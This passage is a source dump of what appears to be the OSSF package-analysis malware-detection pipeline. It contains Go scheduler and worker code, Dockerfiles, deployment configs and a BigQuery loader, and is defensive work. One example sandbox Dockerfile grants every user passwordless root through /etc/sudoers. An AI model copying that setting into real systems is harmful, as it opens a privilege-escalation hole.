 22 | 	downloadDir  = flag.String("d", "", "directory to store downloaded tarballs")
 23 | )
 24 | 
 25 | // cmdError is a simple string error type, used when command usage
 26 | // should be printed alongside the actual error message
 27 | type cmdError struct {
 28 | 	message string
 29 | }
 30 | 
 31 | func (c *cmdError) Error() string {
 32 | 	return c.message
 33 | }
 34 | 
 35 | func newCmdError(message string) error {
 36 | 	return &cmdError{message}
 37 | }
 38 | 
 39 | func downloadPackage(purl packageurl.PackageURL, dir string) error {
 40 | 	pkg, err := worker.ResolvePurl(purl)
 41 | 	if err != nil {
 42 | 		return err
 43 | 	}
 44 | 
 45 | 	fmt.Printf("[%s] %s@%s", pkg.EcosystemName(), pkg.Name(), pkg.Version())
 46 | 
 47 | 	if downloadPath, err := pkg.Manager().DownloadArchive(pkg.Name(), pkg.Version(), dir); err != nil {
 48 | 		fmt.Println()
 49 | 		return err
 50 | 	} else {
 51 | 		fmt.Printf(" -> %s\n", downloadPath)
 52 | 	}
 53 | 
 54 | 	return nil
 55 | }
 56 | 
 57 | func checkDirectoryExists(path string) error {
 58 | 	stat, err := os.Stat(path)
 59 | 
 60 | 	if err != nil && errors.Is(err, os.ErrNotExist) {
 61 | 		return fmt.Errorf("path %s does not exist", path)
 62 | 	}
 63 | 	if err != nil {
 64 | 		return fmt.Errorf("could not stat %s: %w", path, err)
 65 | 	}
 66 | 	if !stat.IsDir() {
 67 | 		return fmt.Errorf("%s is not a directory", path)
 68 | 	}
 69 | 
 70 | 	return nil
 71 | }
 72 | 
 73 | func processFileLine(text string) error {
 74 | 	trimmed := strings.TrimSpace(text)
 75 | 	if len(trimmed) == 0 || trimmed[0] == '#' {
 76 | 		return nil
 77 | 	}
 78 | 
 79 | 	if purl, err := packageurl.FromString(trimmed); err != nil {
 80 | 		return fmt.Errorf("invalid purl '%s': %w", text, err)
 81 | 	} else if err := downloadPackage(purl, *downloadDir); err != nil {
 82 | 		return fmt.Errorf("could not download %s: %w", text, err)
 83 | 	}
 84 | 
 85 | 	return nil
 86 | }
 87 | 
 88 | func run() error {
 89 | 	flag.Parse()
 90 | 
 91 | 	http.DefaultTransport = useragent.DefaultRoundTripper(http.DefaultTransport, "")
 92 | 
 93 | 	if *purlFilePath == "" {
 94 | 		return newCmdError("Please specify packages to download using -f <file>")
 95 | 	}
 96 | 	if *downloadDir == "" {
 97 | 		*downloadDir = "."
 98 | 	}
 99 | 
100 | 	if err := checkDirectoryExists(*downloadDir); err != nil {
101 | 		return err
102 | 	}
103 | 
104 | 	purlFile, err := os.Open(*purlFilePath)
105 | 	if err != nil {
106 | 		return err
107 | 	}
108 | 
109 | 	defer purlFile.Close()
110 | 
111 | 	scanner := bufio.NewScanner(purlFile)
112 | 	for line := 1; scanner.Scan(); line += 1 {
113 | 		if err := processFileLine(scanner.Text()); err != nil {
114 | 			fmt.Fprintf(os.Stderr, "line %d: %v\n", line, err)
115 | 		}
116 | 	}
117 | 
118 | 	return nil
119 | }
120 | 
121 | func main() {
122 | 	if err := run(); err != nil {
123 | 		var cmdErr *cmdError
124 | 		if errors.As(err, &cmdErr) {
125 | 			flag.Usage()
126 | 			fmt.Fprintf(os.Stderr, "\n")
127 | 		}
128 | 		fmt.Fprintf(os.Stderr, "%v\n", err)
129 | 		os.Exit(1)
130 | 	}
131 | }
132 | 


--------------------------------------------------------------------------------
/cmd/scheduler/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM golang:1.23.1@sha256:4a3c2bcd243d3dbb7b15237eecb0792db3614900037998c2cd6a579c46888c1e as build
 2 | WORKDIR /src
 3 | 
 4 | # First cache the dependencies to avoid downloading again on code change
 5 | COPY ./go.mod ./
 6 | COPY ./go.sum ./
 7 | RUN go mod download
 8 | 
 9 | COPY . ./
10 | RUN CGO_ENABLED=0 go build -o scheduler ./cmd/scheduler/main.go
11 | 
12 | 
13 | FROM gcr.io/distroless/base:nonroot@sha256:bc84925113289d139a9ef2f309f0dd7ac46ea7b786f172ba9084ffdb4cbd9490
14 | 
15 | COPY --from=build /src/scheduler /usr/local/bin/scheduler
16 | 
17 | ENTRYPOINT ["/usr/local/bin/scheduler"]
18 | 


--------------------------------------------------------------------------------
/cmd/scheduler/README.md:
--------------------------------------------------------------------------------
 1 | # Scheduler
 2 | 
 3 | This directory contains code to schedule analysis jobs based on incoming package update
 4 | notifications from [Package Feeds](https://github.com/ossf/package-feeds)
 5 | 
 6 | ## Overview
 7 | 
 8 | The Scheduler is a Golang app that runs on Kubernetes and is deployed with [ko](https://github.com/google/ko).
 9 | It is currently deployed in a GKE cluster.
10 | 
11 | ### Local deployment
12 | 
13 | Install ko
14 | 
15 | ```bash
16 | go install github.com/google/ko@latest
17 | ```
18 | 
19 | Then run
20 | 
21 | ```bash
22 | KO_DOCKER_REPO=gcr.io/ossf-malware-analysis ko resolve -f deployment.yaml | kubectl apply -f -
23 | ```
24 | 
25 | ## Design
26 | 
27 | Package Feeds provides a Pub/Sub feed that provides package update notifications.
28 | Each such notification corresponds to a single package event (update / new package).
29 | 
30 | The Scheduler handles ACKing the Package Feeds Pub/Sub feed, filtering out package ecosystems that are unsupported by Package Analysis and sending out another Pub/Sub notification to the Worker which triggers the actual analysis. The Worker then downloads, installs and imports (where applicable) the corresponding package, and monitors runtime behaviour.
31 | 
32 | The following ecosystems are supported
33 | - [`PyPI`](https://pypi.org/)
34 | - [`npmjs`](https://registry.npmjs.org/)
35 | - [`RubyGems`](https://rubygems.org/)
36 | - [`cargo`](https://crates.io/)
37 | - [`Packagist`](https://packagist.org/)
38 | 


--------------------------------------------------------------------------------
/cmd/scheduler/config/deployment.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: apps/v1
 2 | kind: Deployment
 3 | metadata:
 4 |   name: scheduler-deployment
 5 |   labels:
 6 |     app: scheduler
 7 | spec:
 8 |   replicas: 1
 9 |   selector:
10 |     matchLabels:
11 |       app: scheduler
12 |   template:
13 |     metadata:
14 |       labels:
15 |         app: scheduler
16 |     spec:
17 |       containers:
18 |       - name: app
19 |         image: ko://github.com/ossf/package-analysis/cmd/scheduler
20 |         env:
21 |         - name: OSSMALWARE_SUBSCRIPTION_URL
22 |           value: gcppubsub://projects/ossf-malware-analysis/subscriptions/feed-subscription
23 |         - name: OSSMALWARE_WORKER_TOPIC
24 |           value: gcppubsub://projects/ossf-malware-analysis/topics/workers
25 |         - name: LOGGER_ENV
26 |           value: prod
27 | 


--------------------------------------------------------------------------------
/cmd/scheduler/proxy/proxy.go:
--------------------------------------------------------------------------------
 1 | package proxy
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"log/slog"
 6 | 
 7 | 	"github.com/ossf/package-analysis/internal/log"
 8 | 	"gocloud.dev/pubsub"
 9 | )
10 | 
11 | type MessageMutateFunc func(*pubsub.Message) (*pubsub.Message, error)
12 | 
13 | type PubSubProxy struct {
14 | 	topic        *pubsub.Topic
15 | 	subscription *pubsub.Subscription
16 | }
17 | 
18 | func New(topic *pubsub.Topic, subscription *pubsub.Subscription) *PubSubProxy {
19 | 	return &PubSubProxy{
20 | 		topic:        topic,
21 | 		subscription: subscription,
22 | 	}
23 | }
24 | 
25 | func (proxy *PubSubProxy) Listen(ctx context.Context, preprocess MessageMutateFunc) error {
26 | 	for {
27 | 		msg, err := proxy.subscription.Receive(ctx)
28 | 		if err != nil {
29 | 			slog.ErrorContext(ctx, "Error receiving message", "error", err)
30 | 			return err
31 | 		}
32 | 		go func(m *pubsub.Message) {
33 | 			innerCtx := log.ContextWithAttrs(ctx, slog.String("message_id", m.LoggableID))
34 | 			outMsg, err := preprocess(msg)
35 | 			if err != nil {
36 | 				// Failure to parse and process messages should result in an acknowledgement
37 | 				// to avoid the message being redelivered.
38 | 				slog.WarnContext(innerCtx, "Error processing message", "error", err)
39 | 				m.Ack()
40 | 				return
41 | 			}
42 | 			slog.InfoContext(innerCtx, "Sending message to topic")
43 | 			if err := proxy.topic.Send(ctx, outMsg); err != nil {
44 | 				slog.ErrorContext(ctx, "Error sending message", "error", err)
45 | 				return
46 | 			}
47 | 			slog.InfoContext(innerCtx, "Sent message successfully")
48 | 			msg.Ack()
49 | 		}(msg)
50 | 	}
51 | }
52 | 


--------------------------------------------------------------------------------
/cmd/worker/config.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	"log/slog"
 5 | 	"os"
 6 | 
 7 | 	"github.com/ossf/package-analysis/internal/resultstore"
 8 | 	"github.com/ossf/package-analysis/internal/worker"
 9 | )
10 | 
11 | // resultBucketPaths holds bucket paths for the different types of results.
12 | type resultBucketPaths struct {
13 | 	analyzedPkg     string
14 | 	dynamicAnalysis string
15 | 	executionLog    string
16 | 	fileWrites      string
17 | 	staticAnalysis  string
18 | }
19 | 
20 | type sandboxImageSpec struct {
21 | 	tag    string
22 | 	noPull bool
23 | }
24 | 
25 | type config struct {
26 | 	imageSpec sandboxImageSpec
27 | 
28 | 	resultStores *worker.ResultStores
29 | 
30 | 	subURL               string
31 | 	packagesBucket       string
32 | 	notificationTopicURL string
33 | 
34 | 	userAgentExtra string
35 | }
36 | 
37 | func (c *config) LogValue() slog.Value {
38 | 	return slog.GroupValue(
39 | 		slog.String("subscription", c.subURL),
40 | 		slog.String("package_bucket", c.packagesBucket),
41 | 		slog.String("dynamic_results_store", c.resultStores.DynamicAnalysis.String()),
42 | 		slog.String("static_results_store", c.resultStores.StaticAnalysis.String()),
43 | 		slog.String("file_write_results_store", c.resultStores.FileWrites.String()),
44 | 		slog.String("analyzed_packages_store", c.resultStores.AnalyzedPackage.String()),
45 | 		slog.String("execution_log_store", c.resultStores.ExecutionLog.String()),
46 | 		slog.String("image_tag", c.imageSpec.tag),
47 | 		slog.Bool("image_nopull", c.imageSpec.noPull),
48 | 		slog.String("topic_notification", c.notificationTopicURL),
49 | 		slog.String("user_agent_extra", c.userAgentExtra),
50 | 	)
51 | }
52 | 
53 | func resultStoreForEnv(key string) *resultstore.ResultStore {
54 | 	val := os.Getenv(key)
55 | 	if val == "" {
56 | 		return nil
57 | 	}
58 | 	return resultstore.New(val, resultstore.ConstructPath())
59 | }
60 | 
61 | func configFromEnv() *config {
62 | 	return &config{
63 | 		imageSpec: sandboxImageSpec{
64 | 			tag:    os.Getenv("OSSF_SANDBOX_IMAGE_TAG"),
65 | 			noPull: os.Getenv("OSSF_SANDBOX_NOPULL") != "",
66 | 		},
67 | 		resultStores: &worker.ResultStores{
68 | 			AnalyzedPackage: resultStoreForEnv("OSSF_MALWARE_ANALYZED_PACKAGES"),
69 | 			DynamicAnalysis: resultStoreForEnv("OSSF_MALWARE_ANALYSIS_RESULTS"),
70 | 			ExecutionLog:    resultStoreForEnv("OSSF_MALWARE_ANALYSIS_EXECUTION_LOGS"),
71 | 			FileWrites:      resultStoreForEnv("OSSF_MALWARE_ANALYSIS_FILE_WRITE_RESULTS"),
72 | 			StaticAnalysis:  resultStoreForEnv("OSSF_MALWARE_STATIC_ANALYSIS_RESULTS"),
73 | 		},
74 | 		subURL:               os.Getenv("OSSMALWARE_WORKER_SUBSCRIPTION"),
75 | 		packagesBucket:       os.Getenv("OSSF_MALWARE_ANALYSIS_PACKAGES"),
76 | 		notificationTopicURL: os.Getenv("OSSF_MALWARE_NOTIFICATION_TOPIC"),
77 | 
78 | 		userAgentExtra: os.Getenv("OSSF_MALWARE_USER_AGENT_EXTRA"),
79 | 	}
80 | }
81 | 


--------------------------------------------------------------------------------
/cmd/worker/pubsubextender/gcpdriver.go:
--------------------------------------------------------------------------------
 1 | package pubsubextender
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"errors"
 6 | 	"fmt"
 7 | 	"net/url"
 8 | 	"path"
 9 | 	"regexp"
10 | 	"strings"
11 | 	"time"
12 | 
13 | 	api "cloud.google.com/go/pubsub/apiv1"
14 | 	pb "cloud.google.com/go/pubsub/apiv1/pubsubpb"
15 | 	"gocloud.dev/pubsub"
16 | 	"gocloud.dev/pubsub/gcppubsub"
17 | )
18 | 
19 | const (
20 | 	gcpMinAckDeadline = 10 * time.Second
21 | 	gcpMaxAckDeadline = 600 * time.Second
22 | )
23 | 
24 | var subscriptionPathRE = regexp.MustCompile("^projects/.+/subscriptions/.+$")
25 | 
26 | type gcpDriver struct {
27 | 	client *api.SubscriberClient
28 | 	path   string
29 | }
30 | 
31 | func newGCPDriver(u *url.URL, sub *pubsub.Subscription) (driver, error) {
32 | 	d := &gcpDriver{}
33 | 
34 | 	if u.Scheme != gcppubsub.Scheme {
35 | 		return nil, errors.New("unsupported scheme")
36 | 	}
37 | 
38 | 	subPath := path.Join(u.Host, u.Path)
39 | 	if !subscriptionPathRE.MatchString(subPath) {
40 | 		// assume the Host is Project ID and Path is the subscription
41 | 		subPath = fmt.Sprintf("projects/%s/subscriptions/%s", u.Host, strings.TrimPrefix(u.Path, "/"))
42 | 	}
43 | 
44 | 	var c *api.SubscriberClient
45 | 	if !sub.As(&c) {
46 | 		return nil, errors.New("not a GCP subscription")
47 | 	}
48 | 	d.client = c
49 | 	d.path = subPath
50 | 	return d, nil
51 | }
52 | 
53 | // ExtendMessageDeadline implements the driver interface.
54 | func (d *gcpDriver) ExtendMessageDeadline(ctx context.Context, msg *pubsub.Message, deadline time.Duration) error {
55 | 	// Ensure the deadline is within acceptable bounds.
56 | 	if deadline < gcpMinAckDeadline {
57 | 		deadline = gcpMinAckDeadline
58 | 	} else if deadline > gcpMaxAckDeadline {
59 | 		deadline = gcpMaxAckDeadline
60 | 	}
61 | 
62 | 	var rm *pb.ReceivedMessage
63 | 	if !msg.As(&rm) {
64 | 		return errors.New("not a gcp message")
65 | 	}
66 | 
67 | 	if err := d.client.ModifyAckDeadline(ctx, &pb.ModifyAckDeadlineRequest{
68 | 		Subscription:       d.path,
69 | 		AckIds:             []string{rm.AckId},
70 | 		AckDeadlineSeconds: int32(deadline / time.Second),
71 | 	}); err != nil {
72 | 		return fmt.Errorf("failed to extend message deadline: %w", err)
73 | 	}
74 | 
75 | 	return nil
76 | }
77 | 
78 | // GetSubscriptionDeadline implements the driver interface.
79 | func (d *gcpDriver) GetSubscriptionDeadline(ctx context.Context) (time.Duration, error) {
80 | 	resp, err := d.client.GetSubscription(ctx, &pb.GetSubscriptionRequest{Subscription: d.path})
81 | 	if err != nil {
82 | 		return 0, err
83 | 	}
84 | 	return time.Duration(resp.GetAckDeadlineSeconds()) * time.Second, nil
85 | }
86 | 


--------------------------------------------------------------------------------
/cmd/worker/pubsubextender/noopdriver.go:
--------------------------------------------------------------------------------
 1 | package pubsubextender
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"time"
 6 | 
 7 | 	"gocloud.dev/pubsub"
 8 | )
 9 | 
10 | type noopDriver struct{}
11 | 
12 | // ExtendMessageDeadline implements the driver interface.
13 | func (d *noopDriver) ExtendMessageDeadline(ctx context.Context, msg *pubsub.Message, deadline time.Duration) error {
14 | 	return nil
15 | }
16 | 
17 | // GetSubscriptionDeadline implements the driver interface.
18 | func (d *noopDriver) GetSubscriptionDeadline(ctx context.Context) (time.Duration, error) {
19 | 	return 0, nil
20 | }
21 | 


--------------------------------------------------------------------------------
/configs/e2e/.gitignore:
--------------------------------------------------------------------------------
1 | data/
2 | 


--------------------------------------------------------------------------------
/configs/e2e/config/feeds.yml:
--------------------------------------------------------------------------------
 1 | feeds:
 2 |   - type: pypi
 3 |   - type: rubygems
 4 |   - type: packagist
 5 |   - type: npm
 6 |   - type: crates
 7 | publisher:
 8 |   type: kafka
 9 |   config:
10 |     brokers: ["kafka:9092"]
11 |     topic: "package-feeds"
12 | 
13 | poll_rate: "10h"
14 | 


--------------------------------------------------------------------------------
/docs/images/Pipeline diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/Pipeline diagram.png


--------------------------------------------------------------------------------
/docs/images/npm_depconf-typosquat_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/npm_depconf-typosquat_1.png


--------------------------------------------------------------------------------
/docs/images/npm_random_vouchercode-generator_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/npm_random_vouchercode-generator_1.png


--------------------------------------------------------------------------------
/docs/images/npm_random_vouchercode-generator_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/npm_random_vouchercode-generator_2.png


--------------------------------------------------------------------------------
/docs/images/npm_roku_web_core-ajax_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/npm_roku_web_core-ajax_1.png


--------------------------------------------------------------------------------
/docs/images/pypi_discordcmd_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/pypi_discordcmd_1.png


--------------------------------------------------------------------------------
/docs/images/pypi_discordcmd_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/pypi_discordcmd_2.png


--------------------------------------------------------------------------------
/docs/images/pypi_secrevthree_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/pypi_secrevthree_1.png


--------------------------------------------------------------------------------
/examples/README.md:
--------------------------------------------------------------------------------
1 | # Examples
2 | 
3 | - [e2e](e2e/README.md) - A docker-compose deployment with a `package-feeds` -> `scheduler` -> `Analysis`


--------------------------------------------------------------------------------
/examples/custom-sandbox/Dockerfile:
--------------------------------------------------------------------------------
 1 | # Example dockerfile for testing an alternative ecosystem version (PHP v7.4)
 2 | 
 3 | FROM php:7.4-zts-bullseye@sha256:a6d14c89da749f4a316846a97174c48304e605298a5fcf93d53bfbaa58b1fb04 AS image
 4 | 
 5 | # Install Composer
 6 | RUN php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" && \
 7 |     php -r "if (hash_file('sha384', 'composer-setup.php') === '55ce33d7678c5a611085589f1f3ddf8b3c52d662cd01d4ba75c0ee0459970c2200a51f492d557530c71c15d8dba01eae') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;" && \
 8 |     php composer-setup.php && \
 9 |     php -r "unlink('composer-setup.php');" && \
10 |     mv composer.phar /usr/local/bin/
11 | 
12 | RUN apt-get update && \
13 |     apt-get install -y \
14 |         curl \
15 |         wget \
16 |         git \
17 |         unzip \
18 |         libzip-dev \
19 |         libpng-dev \
20 |         sudo
21 | 
22 | # Configure sudo for passwordless execution
23 | RUN echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
24 | 
25 | RUN docker-php-ext-install zip && \
26 |     docker-php-ext-install gd
27 | 
28 | COPY analyze.php /usr/local/bin/
29 | RUN chmod 755 /usr/local/bin/analyze.php
30 | RUN mkdir -p /app
31 | 
32 | FROM scratch
33 | COPY --from=image / /
34 | WORKDIR /app
35 | 
36 | ENTRYPOINT [ "sleep" ]
37 | 
38 | CMD [ "30m" ]
39 | 


--------------------------------------------------------------------------------
/examples/custom-sandbox/Makefile:
--------------------------------------------------------------------------------
 1 | # This Makefile contains commands for building the example custom sandbox and syncing it to the local container cache
 2 | 
 3 | # Registry for Docker images built and used by package analysis
 4 | REGISTRY := gcr.io/ossf-malware-analysis
 5 | IMAGE_NAME := dynamic-analysis-custom
 6 | 
 7 | # Build the sandbox
 8 | build_example_sandbox: DOCKERFILE=$(SANDBOX_DIR)/example/Dockerfile
 9 | 	docker build -t ${REGISTRY}/$(IMAGE_NAME)
10 | 
11 | # Update (sync) locally built sandbox images from Docker to podman.
12 | # This is needed for local analysis; in order to use the updated image,
13 | # pass '-nopull' to scripts/run_analysis.sh
14 | #
15 | sync_example_sandbox:
16 | 	sudo buildah pull docker-daemon:${REGISTRY}/${IMAGE_NAME}
17 | 


--------------------------------------------------------------------------------
/examples/custom-sandbox/README.md:
--------------------------------------------------------------------------------
1 | This directory gives an example of how to build a custom sandbox for testing or development with a different analysis flow.
2 | In particular, this Docker image and analysis script can be used to analyse Packagist packages with a different version of PHP.
3 | 
4 | 
5 | 


--------------------------------------------------------------------------------
/function/loader/README.md:
--------------------------------------------------------------------------------
 1 | # Loader
 2 | 
 3 | This runs periodically as a Cloud Function to load analysis results into
 4 | BigQuery.
 5 | 
 6 | We use this instead of the BigQuery Data Transfer service as it does not support
 7 | load jobs with `WRITE_TRUNCATE`.
 8 | 
 9 | To deploy, run the following command in this directory (/function/loader):
10 | 
11 | ## Dynamic analysis results
12 | 
13 | ```bash
14 | gcloud functions deploy load-data \
15 |     --region=us-central1 \
16 |     --project=ossf-malware-analysis \
17 |     --entry-point=Load \
18 |     --memory=512MB \
19 |     --runtime=go121 \
20 |     --timeout=120s \
21 |     --trigger-topic=load-data \
22 |     --set-env-vars=OSSF_MALWARE_ANALYSIS_RESULTS=ossf-malware-analysis-results,GCP_PROJECT=ossf-malware-analysis
23 | ```
24 | 
25 | ## Static analysis results
26 | 
27 | ```bash
28 | gcloud functions deploy load-staticanalysis-data \
29 |     --region=us-central1 \
30 |     --project=ossf-malware-analysis \
31 |     --entry-point=LoadStaticAnalysis \
32 |     --memory=512MB \
33 |     --runtime=go121 \
34 |     --timeout=120s \
35 |     --trigger-topic=load-data \
36 |     --set-env-vars=OSSF_MALWARE_STATIC_ANALYSIS_RESULTS=ossf-malware-static-analysis-results-v1,GCP_PROJECT=ossf-malware-analysis
37 | ```
38 | 


--------------------------------------------------------------------------------
/function/loader/go.mod:
--------------------------------------------------------------------------------
 1 | module github.com/ossf/package-analysis/loader
 2 | 
 3 | go 1.23.1
 4 | 
 5 | require cloud.google.com/go/bigquery v1.65.0
 6 | 
 7 | require (
 8 | 	cloud.google.com/go v0.118.0 // indirect
 9 | 	cloud.google.com/go/auth v0.14.0 // indirect
10 | 	cloud.google.com/go/auth/oauth2adapt v0.2.7 // indirect
11 | 	cloud.google.com/go/compute/metadata v0.6.0 // indirect
12 | 	cloud.google.com/go/iam v1.3.1 // indirect
13 | 	github.com/apache/arrow/go/v15 v15.0.2 // indirect
14 | 	github.com/felixge/httpsnoop v1.0.4 // indirect
15 | 	github.com/go-logr/logr v1.4.2 // indirect
16 | 	github.com/go-logr/stdr v1.2.2 // indirect
17 | 	github.com/goccy/go-json v0.10.4 // indirect
18 | 	github.com/golang/groupcache v0.0.0-20241129210726-2c02b8208cf8 // indirect
19 | 	github.com/google/flatbuffers v24.12.23+incompatible // indirect
20 | 	github.com/google/s2a-go v0.1.9 // indirect
21 | 	github.com/google/uuid v1.6.0 // indirect
22 | 	github.com/googleapis/enterprise-certificate-proxy v0.3.4 // indirect
23 | 	github.com/googleapis/gax-go/v2 v2.14.1 // indirect
24 | 	github.com/klauspost/compress v1.17.11 // indirect
25 | 	github.com/klauspost/cpuid/v2 v2.2.9 // indirect
26 | 	github.com/pierrec/lz4/v4 v4.1.22 // indirect
27 | 	github.com/zeebo/xxh3 v1.0.2 // indirect
28 | 	go.opentelemetry.io/auto/sdk v1.1.0 // indirect
29 | 	go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.58.0 // indirect
30 | 	go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.58.0 // indirect
31 | 	go.opentelemetry.io/otel v1.33.0 // indirect
32 | 	go.opentelemetry.io/otel/metric v1.33.0 // indirect
33 | 	go.opentelemetry.io/otel/trace v1.33.0 // indirect
34 | 	golang.org/x/crypto v0.32.0 // indirect
35 | 	golang.org/x/exp v0.0.0-20250106191152-7588d65b2ba8 // indirect
36 | 	golang.org/x/mod v0.22.0 // indirect
37 | 	golang.org/x/net v0.34.0 // indirect
38 | 	golang.org/x/oauth2 v0.25.0 // indirect
39 | 	golang.org/x/sync v0.10.0 // indirect
40 | 	golang.org/x/sys v0.29.0 // indirect
41 | 	golang.org/x/text v0.21.0 // indirect
42 | 	golang.org/x/time v0.9.0 // indirect
43 | 	golang.org/x/tools v0.29.0 // indirect
44 | 	golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da // indirect
45 | 	google.golang.org/api v0.216.0 // indirect
46 | 	google.golang.org/genproto v0.0.0-20250106144421-5f5ef82da422 // indirect
47 | 	google.golang.org/genproto/googleapis/api v0.0.0-20250106144421-5f5ef82da422 // indirect
48 | 	google.golang.org/genproto/googleapis/rpc v0.0.0-20250106144421-5f5ef82da422 // indirect
49 | 	google.golang.org/grpc v1.69.4 // indirect
50 | 	google.golang.org/protobuf v1.36.2 // indirect
51 | )
52 | 


--------------------------------------------------------------------------------
/function/loader/load.go:
--------------------------------------------------------------------------------
  1 | package loader
  2 | 
  3 | import (
  4 | 	"context"
  5 | 	_ "embed"
  6 | 	"fmt"
  7 | 	"os"
  8 | 
  9 | 	"cloud.google.com/go/bigquery"
 10 | )
 11 | 
 12 | //go:embed dynamic-analysis-schema.json
 13 | var dynamicAnalysisSchemaJSON []byte
 14 | 
 15 | //go:embed static-analysis-schema.json
 16 | var staticAnalysisSchemaJSON []byte
 17 | 
 18 | type PubSubMessage struct {
 19 | 	Data []byte `json:"data"`
 20 | }
 21 | 
 22 | func runAndWaitForJob(ctx context.Context, loader *bigquery.Loader) error {
 23 | 	job, err := loader.Run(ctx)
 24 | 	if err != nil {
 25 | 		return fmt.Errorf("failed to create load job: %v", err)
 26 | 	}
 27 | 
 28 | 	fmt.Printf("load job created: %s\n", job.ID())
 29 | 
 30 | 	status, err := job.Wait(ctx)
 31 | 	if err != nil {
 32 | 		return fmt.Errorf("error waiting for job: %w", err)
 33 | 	}
 34 | 
 35 | 	if status.Err() != nil {
 36 | 		fmt.Printf("job completed with %d errors\n", len(status.Errors))
 37 | 		for idx, err := range status.Errors {
 38 | 			fmt.Printf("error %d: %v\n", idx, err)
 39 | 		}
 40 | 
 41 | 		return status.Err()
 42 | 	}
 43 | 
 44 | 	return nil
 45 | }
 46 | 
 47 | func Load(ctx context.Context, m PubSubMessage) error {
 48 | 	project := os.Getenv("GCP_PROJECT")
 49 | 	bucket := os.Getenv("OSSF_MALWARE_ANALYSIS_RESULTS")
 50 | 
 51 | 	bq, err := bigquery.NewClient(ctx, project)
 52 | 	if err != nil {
 53 | 		return fmt.Errorf("failed to create BigQuery client: %w", err)
 54 | 	}
 55 | 	defer bq.Close()
 56 | 
 57 | 	schema, err := bigquery.SchemaFromJSON(dynamicAnalysisSchemaJSON)
 58 | 	if err != nil {
 59 | 		return fmt.Errorf("failed to decode schema: %w", err)
 60 | 	}
 61 | 
 62 | 	gcsRef := bigquery.NewGCSReference(fmt.Sprintf("gs://%s/*.json", bucket))
 63 | 	gcsRef.Schema = schema
 64 | 	gcsRef.SourceFormat = bigquery.JSON
 65 | 	gcsRef.MaxBadRecords = 10000
 66 | 
 67 | 	dataset := bq.Dataset("packages")
 68 | 	loader := dataset.Table("analysis").LoaderFrom(gcsRef)
 69 | 	loader.WriteDisposition = bigquery.WriteTruncate
 70 | 	loader.TimePartitioning = &bigquery.TimePartitioning{
 71 | 		Type:  bigquery.DayPartitioningType,
 72 | 		Field: "CreatedTimestamp",
 73 | 	}
 74 | 
 75 | 	return runAndWaitForJob(ctx, loader)
 76 | }
 77 | 
 78 | func LoadStaticAnalysis(ctx context.Context, m PubSubMessage) error {
 79 | 	project := os.Getenv("GCP_PROJECT")
 80 | 	bucket := os.Getenv("OSSF_MALWARE_STATIC_ANALYSIS_RESULTS")
 81 | 
 82 | 	bq, err := bigquery.NewClient(ctx, project)
 83 | 	if err != nil {
 84 | 		return fmt.Errorf("failed to create BigQuery client: %w", err)
 85 | 	}
 86 | 	defer bq.Close()
 87 | 
 88 | 	schema, err := bigquery.SchemaFromJSON(staticAnalysisSchemaJSON)
 89 | 	if err != nil {
 90 | 		return fmt.Errorf("failed to decode schema: %w", err)
 91 | 	}
 92 | 
 93 | 	gcsRef := bigquery.NewGCSReference(fmt.Sprintf("gs://%s/*.json", bucket))
 94 | 	gcsRef.Schema = schema
 95 | 	gcsRef.SourceFormat = bigquery.JSON
 96 | 	gcsRef.MaxBadRecords = 10000
 97 | 
 98 | 	dataset := bq.Dataset("packages")
 99 | 	loader := dataset.Table("staticanalysis").LoaderFrom(gcsRef)
100 | 	loader.WriteDisposition = bigquery.WriteTruncate
101 | 	loader.TimePartitioning = &bigquery.TimePartitioning{
102 | 		Type:  bigquery.DayPartitioningType,
103 | 		Field: "created",
104 | 	}
105 | 
106 | 	return runAndWaitForJob(ctx, loader)
107 | }
108 | 


--------------------------------------------------------------------------------
/infra/README.md:
--------------------------------------------------------------------------------
 1 | # Package Analysis Infrastructure
 2 | 
 3 | This directory contains all the configuration, documentation and scripts needed
 4 | to manage the package analysis infrastructure.
 5 | 
 6 | ## Production Cluster
 7 | 
 8 | The Production cluster runs in GCP.
 9 | 
10 | To access the cluster, run:
11 | 
12 | ```shell
13 | $ gcloud container clusters get-credentials analysis-cluster --zone=us-central1-c --project=ossf-malware-analysis
14 | ```
15 | 
16 | ### Updating Container Images
17 | 
18 | To update container images, run:
19 | 
20 | ```shell
21 | $ cd build
22 | $ make push_all_images
23 | ```
24 | 


--------------------------------------------------------------------------------
/infra/cloudbuild/dynamic_loader/cloudbuild.yaml:
--------------------------------------------------------------------------------
 1 | steps:
 2 | - name: gcr.io/google.com/cloudsdktool/cloud-sdk
 3 |   env:
 4 |   - 'PROJECT_ID=ossf-malware-analysis'
 5 |   - 'LOAD_DATASET=loading'
